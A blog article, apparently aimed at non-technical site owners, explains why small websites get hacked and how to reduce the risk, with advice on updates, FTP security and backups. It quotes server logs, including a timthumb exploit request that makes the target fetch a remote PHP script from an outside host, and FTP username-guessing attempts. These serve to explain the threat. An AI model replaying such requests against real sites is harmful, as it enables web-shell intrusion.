A common question we receive is ‘Why did I get hacked? We haven’t done anything’. The easy answer is, it’s not you or your site, it’s most likely an random attack by an automated program or robot. There are ‘high score’ sites where people list their defacements and conquests. It’s a numbers game and it does not matter if it’s a small site with photos or a business lifeline. HOW DID MY SITE GET HACKED? This question is harder to answer, but in these days of dynamic sites it is usually the website itself that is the culprit. The advent of free, open source scripts created by third parties specifically aimed at ‘non-techies’ has created a vast swathe of content creators who don’t know how their websites work. This is not necessarily a bad thing, however it does lead to easier targets for hackers.
COMMON ENTRY POINTSWeb Scripts – scripts such as WordPress, Joomla, Drupal. WordPress for example had the recently publicised timthumb vulnerability. As a widely used image publishing and resizing tool, it eventually turned out that a simple coding issue allowed an attacker to gain a ‘web shell’ inside wordpress sites. This sparked a mass series of automated attacks looking for ‘timthumb’. It’s still going on today. 22.214.171.124 – - [09/May/2012:11:27:38 +0100] “GET //wp-content/themes/mimbopro/scripts/timthumb.php?src=http%3a%2f%2fpicasa.combos.aaa.org/byroe.php HTTP/1.1″ 404 1276 “-” “Mozilla/4.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/5.0)” File Security – most hosting solutions allow file access via FTP. This is protected by a single username and password that, if compromised, would allow an attacker to upload anything to your site. FTP is an old protocol and transmits the username and password in plain text. It is trivial, under the right conditions, to gain access to these details. The details can also be guessed if they are insecure. May 9 10:41:11 server ftpd: (126.96.36.199[188.8.131.52]) – USER admin: no such user found from 184.108.40.206 [220.127.116.11] to 18.104.22.168:21 May 9 10:41:11 server ftpd: (22.214.171.124[126.96.36.199]) – USER webmaster: no such user found from 188.8.131.52 [184.108.40.206] to 220.127.116.11:21 Other Websites – The majority of people use shared hosting as it reduces costs however it is possible to be ‘backdoored’ by another site on the same platform depending on server conditions and permission setup. WHAT CAN I DO TO PREVENT GETTING HACKED? –Easy To Do Keep your scripts up to date. Make it a weekly occurrence to check for any updates. Most scripts have automated notifiers in the admin section that will prompt you to update. Add additional protection to your sites rather than relying on the security features of the third party creating your site. For example, in the administration section of your site add a an additional user and password prompt.
Do not use insecure usernames and passwords for file access, and ask your webhost if FTP over SSL, or FTP over SSH (SFTP) is available. Replacing l3tt3r5 with numb3r5 is not an effective security measure. Not really a prevention, but BACKUP. Don’t rely on anyone doing this but you. Backup. Backup. Did I say it enough times? Back UP. –Harder to do or not cost effective Lock down permissions on your site to prevent file changes and only allow uploading when adding content. Some hosts have a ‘lock this site’ option that will prevent anyone writing to the website be it your FTP user, or anything uploaded to the site. This is only effective in certain situations where temporary files are not needed etc. Move to virtual or dedicated hosting and apply tools such as an application firewall or systems to track file changes such as Tripwire.
Alan Ogden is United Kingdom Author. He is working with technology firm , he written so many articles on propular topics like website hacked and site hacked and much more. He has applied his knowledge and understanding to a wide variety of technology services.